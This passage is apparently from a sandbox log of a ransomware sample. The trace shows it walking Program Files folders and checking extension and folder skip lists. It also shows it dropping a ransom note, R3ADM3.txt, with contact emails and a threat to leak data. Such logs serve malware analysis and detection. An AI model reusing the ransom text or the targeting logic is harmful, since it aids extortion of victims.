ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0159.937] lstrcmpW (lpString1="sqlceca35.dll", lpString2=".") returned 1 [0159.937] lstrcmpW (lpString1="sqlceca35.dll", lpString2="..") returned 1 [0159.937] StrStrIW (lpFirst="sqlceca35.dll", lpSrch=".UAKXC") returned 0x0 [0159.937] StrStrIW (lpFirst="sqlceca35.dll", lpSrch=".exe") returned 0x0 [0159.937] StrStrIW (lpFirst="sqlceca35.dll", lpSrch=".dll") returned=".dll" [0159.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0159.937] lstrcmpW (lpString1="sqlcecompact35.dll", lpString2=".") returned 1 [0159.937] lstrcmpW (lpString1="sqlcecompact35.dll", lpString2="..") returned 1 [0159.937] StrStrIW (lpFirst="sqlcecompact35.dll", lpSrch=".UAKXC") returned 0x0 [0159.937] StrStrIW (lpFirst="sqlcecompact35.dll", lpSrch=".exe") returned 0x0 [0159.937] StrStrIW (lpFirst="sqlcecompact35.dll", lpSrch=".dll") returned=".dll" [0159.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0159.938] lstrcmpW (lpString1="sqlceer35EN.dll", lpString2=".") returned 1 [0159.938] lstrcmpW (lpString1="sqlceer35EN.dll", lpString2="..") returned 1 [0159.938] StrStrIW (lpFirst="sqlceer35EN.dll", lpSrch=".UAKXC") returned 0x0 [0159.938] StrStrIW (lpFirst="sqlceer35EN.dll", lpSrch=".exe") returned 0x0 [0159.938] StrStrIW (lpFirst="sqlceer35EN.dll", lpSrch=".dll") returned=".dll" [0159.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab958d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlceme35.dll", cAlternateFileName="SQLCEM~1.DLL")) returned 1 [0159.938] lstrcmpW (lpString1="sqlceme35.dll", lpString2=".") returned 1 [0159.938] lstrcmpW (lpString1="sqlceme35.dll", lpString2="..") returned 1 [0159.938] StrStrIW (lpFirst="sqlceme35.dll", lpSrch=".UAKXC") returned 0x0 [0159.938] StrStrIW (lpFirst="sqlceme35.dll", lpSrch=".exe") returned 0x0 [0159.938] StrStrIW (lpFirst="sqlceme35.dll", lpSrch=".dll") returned=".dll" [0159.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x3fa40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlceoledb35.dll", cAlternateFileName="SQLCEO~1.DLL")) returned 1 [0159.938] lstrcmpW (lpString1="sqlceoledb35.dll", lpString2=".") returned 1 [0159.938] lstrcmpW (lpString1="sqlceoledb35.dll", lpString2="..") returned 1 [0159.938] StrStrIW (lpFirst="sqlceoledb35.dll", lpSrch=".UAKXC") returned 0x0 [0159.938] StrStrIW (lpFirst="sqlceoledb35.dll", lpSrch=".exe") returned 0x0 [0159.938] StrStrIW (lpFirst="sqlceoledb35.dll", lpSrch=".dll") returned=".dll" [0159.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x114e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlceqp35.dll", cAlternateFileName="SQLCEQ~1.DLL")) returned 1 [0159.938] lstrcmpW (lpString1="sqlceqp35.dll", lpString2=".") returned 1 [0159.938] lstrcmpW (lpString1="sqlceqp35.dll", lpString2="..") returned 1 [0159.938] StrStrIW (lpFirst="sqlceqp35.dll", lpSrch=".UAKXC") returned 0x0 [0159.938] StrStrIW (lpFirst="sqlceqp35.dll", lpSrch=".exe") returned 0x0 [0159.938] StrStrIW (lpFirst="sqlceqp35.dll", lpSrch=".dll") returned=".dll" [0159.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 1 [0159.939] lstrcmpW (lpString1="sqlcese35.dll", lpString2=".") returned 1 [0159.939] lstrcmpW (lpString1="sqlcese35.dll", lpString2="..") returned 1 [0159.939] StrStrIW (lpFirst="sqlcese35.dll", lpSrch=".UAKXC") returned 0x0 [0159.939] StrStrIW (lpFirst="sqlcese35.dll", lpSrch=".exe") returned 0x0 [0159.939] StrStrIW (lpFirst="sqlcese35.dll", lpSrch=".dll") returned=".dll" [0159.939] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 0 [0159.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0159.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66c8 | out: hHeap=0xea0000) returned 1 [0159.939] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0159.939] Sleep (dwMilliseconds=0x32) [0160.056] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede4b0 | out: hHeap=0xea0000) returned 1 [0160.056] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede290 | out: hHeap=0xea0000) returned 1 [0160.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0160.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.056] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66c8 [0160.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34cb0 [0160.057] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.057] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.057] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66c8 | out: hHeap=0xea0000) returned 1 [0160.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0160.166] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0160.166] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0160.167] CloseHandle (hObject=0x6dc) returned 1 [0160.168] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34cb0 | out: hHeap=0xea0000) returned 1 [0160.168] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.168] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6455d7b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6455d7b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0160.168] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0160.168] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6455d7b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6455d7b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.168] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0160.168] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0160.168] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documentation", cAlternateFileName="DOCUME~1")) returned 1 [0160.169] lstrcmpW (lpString1="Documentation", lpString2=".") returned 1 [0160.169] lstrcmpW (lpString1="Documentation", lpString2="..") returned 1 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="tmp") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="winnt") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="temp") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="thumb") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="$Recycle.Bin") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="System Volume Information") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="Boot") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="Windows") returned 0x0 [0160.169] StrStrIW (lpFirst="Documentation", lpSrch="Trend Micro") returned 0x0 [0160.169] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66c8 [0160.169] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.169] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.169] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34cb0 [0160.169] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.169] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.169] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66c8 | out: hHeap=0xea0000) returned 1 [0160.169] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66c8 [0160.169] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede290 [0160.169] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34cb0 | out: hHeap=0xea0000) returned 1 [0160.169] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6455d7b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x6455d7b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6455d7b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0160.169] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0160.169] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0160.169] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0160.170] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0160.170] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0160.170] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0160.170] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0160.170] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0160.170] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0160.170] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Runtime", cAlternateFileName="")) returned 1 [0160.170] lstrcmpW (lpString1="Runtime", lpString2=".") returned 1 [0160.170] lstrcmpW (lpString1="Runtime", lpString2="..") returned 1 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="tmp") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="winnt") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="temp") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="thumb") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="$Recycle.Bin") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="System Volume Information") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="Boot") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="Windows") returned 0x0 [0160.170] StrStrIW (lpFirst="Runtime", lpSrch="Trend Micro") returned 0x0 [0160.170] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.170] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.170] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34cb0 [0160.170] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.170] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.170] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d08 [0160.170] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77947f0 [0160.170] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34cb0 | out: hHeap=0xea0000) returned 1 [0160.171] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Runtime", cAlternateFileName="")) returned 0 [0160.171] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.171] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd60 | out: hHeap=0xea0000) returned 1 [0160.171] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0160.171] Sleep (dwMilliseconds=0x32) [0160.231] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.231] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0160.231] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede4b0 [0160.231] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0160.231] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede428 [0160.231] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0160.231] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0160.231] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd60 [0160.231] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede538 [0160.231] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede5c0 [0160.231] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0160.231] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede5c0 | out: hHeap=0xea0000) returned 1 [0160.231] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede538 | out: hHeap=0xea0000) returned 1 [0160.231] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd60 | out: hHeap=0xea0000) returned 1 [0160.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0160.235] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0160.235] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0160.237] CloseHandle (hObject=0x6dc) returned 1 [0160.237] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0160.237] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0160.237] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x645f5d30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x645f5d30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0160.238] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0160.238] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x645f5d30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x645f5d30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.238] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0160.238] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0160.238] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x645f5d30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x645f5d30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x645f5d30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0160.238] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0160.238] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0160.238] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0160.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0160.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0160.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0160.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0160.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0160.239] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0160.239] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 1 [0160.239] lstrcmpW (lpString1="v1.0", lpString2=".") returned 1 [0160.239] lstrcmpW (lpString1="v1.0", lpString2="..") returned 1 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="tmp") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="winnt") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="temp") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="thumb") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="$Recycle.Bin") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="System Volume Information") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="Boot") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="Windows") returned 0x0 [0160.239] StrStrIW (lpFirst="v1.0", lpSrch="Trend Micro") returned 0x0 [0160.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0160.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede538 [0160.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0160.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede538 | out: hHeap=0xea0000) returned 1 [0160.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0160.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd60 [0160.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34cb0 [0160.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0160.240] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, 